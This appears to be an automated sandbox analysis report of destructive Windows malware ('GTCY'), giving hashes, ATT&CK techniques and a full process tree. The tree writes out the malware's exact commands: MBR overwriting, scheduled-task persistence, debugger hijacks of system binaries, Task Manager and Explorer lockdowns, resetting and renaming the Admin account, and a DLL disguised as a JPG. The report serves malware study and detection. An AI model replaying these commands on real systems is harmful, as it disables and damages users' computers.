Analysis
-
max time kernel
93s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
24-04-2022 13:12
General
-
Target
main.exe
-
Size
33.9MB
-
MD5
4d3712c7e5c35bf7ec8a74b171389a4f
-
SHA1
8f1e5ecdafb2ca68ee48b065ecd38f6790dfef3d
-
SHA256
ba591d8b11be9b59dfa8fb5fdc6ba9c9e5f96db4d2be323d7a3cdf9c04f935bb
-
SHA512
31939f394536d8912eed9267b1b09fc65f461c25d5343b6eabeb7638749be36945dd2e907bcd6766a17a83ee285ea1e8afa86fac4fc3a6379837e12c7acf0fbd
Malware Config
Signatures
-
Modifies system executable filetype association 2 TTPs 4 IoCs
-
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
-
Executes dropped EXE 2 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Sets file execution options in registry 2 TTPs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Enumerates connected drives 3 TTPs 45 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 15 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 1 IoCs
-
Modifies Control Panel 2 IoCs
-
Modifies registry class 26 IoCs
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: LoadsDriver 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 46 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SetWindowsHookEx 38 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\main.exe"C:\Users\Admin\AppData\Local\Temp\main.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EC1.tmp\EC2.tmp\EC3.bat C:\Users\Admin\AppData\Local\Temp\main.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\main.exemain.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\GTCY +S +H4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\rundll32.exerundll32 main.jpg main4⤵
- Loads dropped DLL
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\notepad.exenotepad.exe a.txt5⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32 TerminatorFrame.dll,ClearSectorAndESP5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32 TerminatorFrame.dll,ClearSectorAndESP6⤵
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
-
C:\Windows\SysWOW64\subst.exesubst b: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst h: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst i: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst j: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst k: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst l: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst m: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst n: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst o: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst p: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst q: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst r: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst s: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst t: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst u: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst v: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst w: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst x: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst y: C:\5⤵
-
C:\Windows\SysWOW64\subst.exesubst z: C:\5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\GTCY\*.* +S +H5⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\WScript.exeC:\Windows\System32\WScript.exe C:\Windows\system32\slmgr.vbs /upk5⤵
-
C:\Windows\SysWOW64\WScript.exeC:\Windows\System32\WScript.exe C:\Windows\system32\slmgr.vbs /cpky5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /TN IntelCAS /TR "rundll32 %windir%\GTCY\main.dll main" /RL HIGHEST /SC ONLOGON5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout" /v "Scancode Map" /d 0000000000000000710000000000010000003B0000003C0000003D0000003E0000003F0000004000000041000000420000004300000044000000570000005800000037E000004600000052E0000047E0000049E0000051E000004FE0000053E0000048E000004BE0000050E000004DE00000520000005300000051000000500000004F0000004B0000004C0000004D0000004E0000004900000048000000470000004500000035E00000370000004A0000002900000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000F0000001000000011000000130000001600000017000000190000001A0000001B0000002B000000280000002700000026000000250000002400000022000000210000003A0000002A0000001D0000005BE00000380000002C0000002D0000002E0000002F0000003000000032000000330000003400000035000000360000001DE000005DE000005CE0000038E000005900000065E0000021E000006BE000005EE000005FE000006AE0000069E0000068E0000067E0000032E000006CE000006DE0000066E0000020E000002EE000002CE0000030E0000019E0000010E0000024E0000022E000000000 /t REG_BINARY /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /d GTCY /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /d "Your computer has been turned into a pile of rubbish by GTCY. It will be difficult to continue to repair it. Keep using this computer? :D" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskmgr /d 1 /t REG_DOWORD/f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CLASSES_ROOT\exefile\DefaultIcon /ve /d %appdart%\a.ico /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DefaultIcon /ve /d C:\Users\Admin\AppData\Roaming\a.ico /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Start Page"/t REG_SZ /d sbsbbsbsbsbsb /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Shell /t REG_SZ /d sbsb /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_BINARY /d FFFFFFFF /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v explorer /d %appdata%\addreg.exe /f5⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsHistory /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClearRecentDocsOnExit /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMHelp /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFavoritesMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetFolders /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoActiveDesktopChanges /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFileMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoChangeStartMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPlanel /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoActiveDesktop /t REG_DWORD /d 1 /f5⤵
- Modifies system executable filetype association
- Modifies registry class
-
C:\Windows\SysWOW64\net.exenet user Admin 14365⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin 14366⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v Debugger /d GTCY.exe /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe" /v Debugger /d GTCY.exe /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe" /v Debugger /d GTCY.exe /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe" /v Debugger /d GTCY.exe /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winload.exe" /v Debugger /d GTCY.exe /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e96f-e325-11ce-bfc1-08002be10318} /v UpperFilters /d GTCY /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e96b-e325-11ce-bfc1-08002be10318} /v UpperFilters /d GTCY /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318} /v LowerFilters /d GTCY /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoChangeStartMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContexMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMHelp /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetActiveDesktop /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFavoritesMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClearRecentDocsOnExit /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartBanner /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f5⤵
- Modifies system executable filetype association
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic useraccount where name="Admin" rename "010000"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\GTCY\3.exeC:\Windows\GTCY\3.exe5⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.execmd /c del_file.bat5⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\mmc.exe6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\mmc.exe /grant Administrators:F6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im C:\Windows\system32\mmc.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32 TerminatorFrame.dll,payLoadSquare5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32 TerminatorFrame.dll,payLoadSquare6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exerundll32 TerminatorFrame.dll,payLoadMoveDesk5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32 TerminatorFrame.dll,payLoadMoveDesk6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exerundll32 TerminatorFrame.dll,payLoadCopyCur5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32 TerminatorFrame.dll,payLoadCopyCur6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exerundll32 TerminatorFrame.dll,payLoad_Ellipse5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32 TerminatorFrame.dll,payLoad_Ellipse6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exerundll32 TerminatorFrame.dll,payLoadwave5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32 TerminatorFrame.dll,payLoadwave6⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32 TerminatorFrame.dll,payLoadMSGBX5⤵
-
C:\Windows\system32\rundll32.exerundll32 TerminatorFrame.dll,payLoadMSGBX6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\rundll32.exerundll32 TerminatorFrame.dll,payLoadpayLoadpat5⤵
-
C:\Windows\system32\rundll32.exerundll32 TerminatorFrame.dll,payLoadpayLoadpat6⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32 TerminatorFrame.dll,payLoadTunnel5⤵
-
C:\Windows\system32\rundll32.exerundll32 TerminatorFrame.dll,payLoadTunnel6⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5601⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1856396850-2142021352-691588581-627816564-1987118024-10042985261836179775-1287085752"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-979333113-14219257611863926823-360347754-779393867-1806173877628224797-1063942385"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "9071643651099870656-522351180-368517422272603965503453265-12898509521295394909"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-10533007081513422081511217690-1295391406-7633679610098896115423748361068657178"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Change Default File Association
1Registry Run Keys / Startup Folder
2Hidden Files and Directories
2Bootkit
1Scheduled Task
1Defense Evasion
Modify Registry
4Hidden Files and Directories
2File Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\EC1.tmp\EC2.tmp\EC3.batFilesize
42B
MD536ee24058af6f016194737abc855c0ff
SHA170ba47ce52330fe2ccae4a64d8f925486c80d3d2
SHA256e7c36d8464f76e1996089f7ff0768c6918ddca562020d179cf69bf546bdb86d0
SHA512023fa8339b5cc8bb70dff98bf50e7c88abfe13a2854d9d1580cf2b583087bb866b7151e05bc55484c5faed16956022263c5aa94063981199c6c4354c03567570
-
C:\Users\Admin\AppData\Roaming\main.exeFilesize
35.5MB
MD562c8475d111bc96d1c0cccce7b52fbdd
SHA1826cf3be24354ea803778389bbe225f9794fc296
SHA25642d9cbb0e0ee3c866e5557dfdb85e1157b658f3b481e2606ec43b1562a82019f
SHA5127c98f7d9f750fd251776752ba47e3d5cd3ce957207dee7bf012bc0456d3142c2aeddf55cc0060fbf2f5cb981594aef39d3e939add5013f1eb5aaf44c3a35a3b1
-
C:\Users\Admin\AppData\Roaming\main.exeFilesize
35.5MB
MD562c8475d111bc96d1c0cccce7b52fbdd
SHA1826cf3be24354ea803778389bbe225f9794fc296
SHA25642d9cbb0e0ee3c866e5557dfdb85e1157b658f3b481e2606ec43b1562a82019f
SHA5127c98f7d9f750fd251776752ba47e3d5cd3ce957207dee7bf012bc0456d3142c2aeddf55cc0060fbf2f5cb981594aef39d3e939add5013f1eb5aaf44c3a35a3b1
-
C:\Users\Admin\AppData\Roaming\main.jpgFilesize
34.6MB
MD504fd6752910cf0bdd66ebdc0f3fb996c
SHA1834bb096c2d586cb11f5990e21da46eb9ad224e6
SHA25622dd56f4c54635dd0f1626431e8bdc07b21ef025aadbc96292ddac69497ad425
SHA51268ac226b0ce6e45ec4cd24538bb86779c25cb8e683082a33abf174e5360537f50289a20d626781b725a9760b5f202036c29624253bc250254a3fd650b4fd74ac
-
C:\Windows\GTCY\3.exeFilesize
587KB
MD599f5d6b5dce312ebe59633f18d4558ed
SHA18d05e0105e8d23a7494f7ddffbae133aa39fe380
SHA2567ba719706fde59ffe5af1f4fa61b08bb4a138071d84951c127710390583eb2e7
SHA512a96ca75322464a712233939f4371b8ef15fbfe08e0718c64f0f3f07234f254f54ae04e7ea0027196384275bd2f9175022dcd7974763964a48f23656dd7ce5480
-
C:\Windows\GTCY\3.exeFilesize
587KB
MD599f5d6b5dce312ebe59633f18d4558ed
SHA18d05e0105e8d23a7494f7ddffbae133aa39fe380
SHA2567ba719706fde59ffe5af1f4fa61b08bb4a138071d84951c127710390583eb2e7
SHA512a96ca75322464a712233939f4371b8ef15fbfe08e0718c64f0f3f07234f254f54ae04e7ea0027196384275bd2f9175022dcd7974763964a48f23656dd7ce5480
-
C:\Windows\GTCY\main.dllFilesize
34.6MB
MD504fd6752910cf0bdd66ebdc0f3fb996c
SHA1834bb096c2d586cb11f5990e21da46eb9ad224e6
SHA25622dd56f4c54635dd0f1626431e8bdc07b21ef025aadbc96292ddac69497ad425
SHA51268ac226b0ce6e45ec4cd24538bb86779c25cb8e683082a33abf174e5360537f50289a20d626781b725a9760b5f202036c29624253bc250254a3fd650b4fd74ac
-
C:\Windows\SysWOW64\TerminatorFrame.dllFilesize
124KB
MD52ea1b5c1c3588590459e47f080863d0e
SHA1115ed159f95b569a9ae66dc1ff479fedb35af945
SHA256fc98308900c4b94273b0f61cba62985532605ccd639b1c5767d04dafad1c5602
SHA51240f2bbf514a2e9b2c79bef2c74de546dd1c8e33a74c66c3ee71431df4e22bfba20f0781f06bb0748ea486955dddee07624c6e49b94a0d24e017a37ff80d7f925
-
C:\Windows\SysWOW64\a.txtFilesize
225B
MD5eef729da9ce86bb8729de561fa9fa7c9
SHA1ae172eecb15c595e9a5d79262d79d274afdba06d
SHA25676ee455843a398114437e92714529665a6bf5acc575811232e419cf8076fb9c9
SHA512d46b109021a196987e374253988fd3f1d56586a25fde0898b667a756bf7637c057366fbeebc91533740e3783bed6bc1dcd306192240fe6fd35b853568879f766
-
C:\Windows\SysWOW64\del_file.batFilesize
1KB
MD5d4cdbd99386a616ebd212e867948b877
SHA1b1e58ec19ef1fad9513b8908659116b04b78198c
SHA256f604f3477c10f29aad4aaecfb982c2e859c7334c2d10e57b38352d0b581e4516
SHA512d9075588a72713a384a808c13c52a3aaf9b94a36873ce8034b24b03458850e0322bd3728f5b3f81dc687def384fc05eed5c4e59023abc5880fcc531d0be5cc6a
-
\Users\Admin\AppData\Local\Temp\E_N60005\iext.fnrFilesize
204KB
MD5856495a1605bfc7f62086d482b502c6f
SHA186ecc67a784bc69157d664850d489aab64f5f912
SHA2568c8254cb49f7287b97c7f952c81edabc9f11f3fa3f02f265e67d5741998cf0bf
SHA51235a6e580cd362c64f1e1f9c3439660bd980ec437bd8cabbdc49479ceb833cd8cb6c82d2fb747516d5cfcf2af0ba540bc01640171fbe3b4d0e0a3eeeaa69dd1d9
-
\Users\Admin\AppData\Local\Temp\E_N60005\krnln.fnrFilesize
1.2MB
MD51eece63319e7c5f6718562129b1572f1
SHA1089ea3a605639eb1292f6a2a9720f0b2801b0b6e
SHA2564bed8a6e4e1548fddee40927b438132b47ef2aca6e9beb06b89fcf7714726310
SHA51213537d1dd80fa87b6b908361957e8c434ca547a575c8c8aab43423063e60cb5523fb1843a467ae73db4a64d278c06b831551e78ae6d895201f7ef0c5b162c1ab
-
\Users\Admin\AppData\Roaming\main.jpgFilesize
34.6MB
MD504fd6752910cf0bdd66ebdc0f3fb996c
SHA1834bb096c2d586cb11f5990e21da46eb9ad224e6
SHA25622dd56f4c54635dd0f1626431e8bdc07b21ef025aadbc96292ddac69497ad425
SHA51268ac226b0ce6e45ec4cd24538bb86779c25cb8e683082a33abf174e5360537f50289a20d626781b725a9760b5f202036c29624253bc250254a3fd650b4fd74ac
-
\Windows\GTCY\3.exeFilesize
587KB
MD599f5d6b5dce312ebe59633f18d4558ed
SHA18d05e0105e8d23a7494f7ddffbae133aa39fe380
SHA2567ba719706fde59ffe5af1f4fa61b08bb4a138071d84951c127710390583eb2e7
SHA512a96ca75322464a712233939f4371b8ef15fbfe08e0718c64f0f3f07234f254f54ae04e7ea0027196384275bd2f9175022dcd7974763964a48f23656dd7ce5480
-
\Windows\SysWOW64\ExtraDll.dllFilesize
97KB
MD5c35425ad1f0c32225d307310deccc335
SHA1b2e347b244e40ffa113dffaffd1895777e3ac30a
SHA25648773d597155dc39dd172c26867972da89dd61fcee0d138433eda26a2d8633b7
SHA51247b6a7447fcc4f9f21018f608fcbdb5650f16cbd869cae5d4ed5d9b88ca1e944de1cac10e9a252aa7b210f1a31456c0ed91728b8a7e24def99d7e3f9683e2bae
-
\Windows\SysWOW64\TerminatorFrame.dllFilesize
124KB
MD52ea1b5c1c3588590459e47f080863d0e
SHA1115ed159f95b569a9ae66dc1ff479fedb35af945
SHA256fc98308900c4b94273b0f61cba62985532605ccd639b1c5767d04dafad1c5602
SHA51240f2bbf514a2e9b2c79bef2c74de546dd1c8e33a74c66c3ee71431df4e22bfba20f0781f06bb0748ea486955dddee07624c6e49b94a0d24e017a37ff80d7f925
-
\Windows\SysWOW64\TerminatorFrame.dllFilesize
124KB
MD52ea1b5c1c3588590459e47f080863d0e
SHA1115ed159f95b569a9ae66dc1ff479fedb35af945
